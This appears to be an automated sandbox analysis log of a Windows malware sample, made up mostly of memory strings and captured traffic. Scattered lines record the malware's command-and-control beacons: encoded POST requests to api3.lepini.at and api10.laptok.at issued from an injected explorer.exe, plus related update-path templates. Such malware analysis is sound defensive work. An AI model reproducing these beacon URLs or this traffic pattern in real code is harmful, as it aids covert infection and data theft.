Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.5.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sCMitgD7TpJ4lL/YaaCrfmGr7HSdfEDFBfZy_/2F6yiEd5nRfk_/2FyBL0Qi/YvC2A5PzJxWwGDWFfurX0IH/Pl4gbL8NNR/pL5PpYu5LBw4qrHSp/5GLoVTygQHxi/lMsRYGiVP_2/BVFS_2BKJaP3UA/ShYtgHcZ3ceFWWHUPV6JY/AjkOe7pkq3uVlpG4/TAfeBct56eabx37/kmJm57Oum_2FZFTOYP/K3KMyMRiN/6VsuEdtgXSIPx_2FOzhO/Wfirq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 09:23:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: {8A523B9D-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF4F2ABC3EEE61E1AD.TMP.4.dr	String found in binary or memory: http://api10.laptok.at/api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzr
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGv
Source: {92E377B0-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF52531A3CB90001E8.TMP.4.dr	String found in binary or memory: http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47
Source: explorer.exe, 00000024.00000000.981670591.000000000A897000.00000004.00000001.sdmp, ~DF703176632CAC7978.TMP.4.dr	String found in binary or memory: http://api10.laptok.at/api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4s
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sC
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/Y90IJ6cExB9qSgb/oNO0xdo8DXz1Gn7txC/ImxUnG_2B/FZLeWtZNMElpVIuMqsnD/ao9u_2B
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001A.00000002.999208445.000001E7AABF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
